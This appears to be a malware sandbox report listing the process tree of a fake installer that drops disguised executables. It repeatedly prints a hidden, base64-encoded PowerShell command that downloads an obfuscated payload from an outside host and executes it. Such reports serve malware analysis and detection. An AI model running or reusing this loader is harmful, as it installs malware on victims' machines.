| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\" -spe -an -ai#7zMap25084:92:7zEvent26371
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\setup\" -spe -an -ai#7zMap24552:104:7zEvent9109
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7F445D1A15E1E8DFF56A52947A4EF254
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrEFB7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x35c,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2956 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3088 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3428 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5012 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4848 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4724 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3340 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5828 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6152 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6784 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6792 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5236 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3624 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6040 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x534
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4204 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\locale\pureviolet.pot"
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe"
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe"
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4912 -ip 4912
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2080
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4912 -ip 4912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2056
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2092
C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
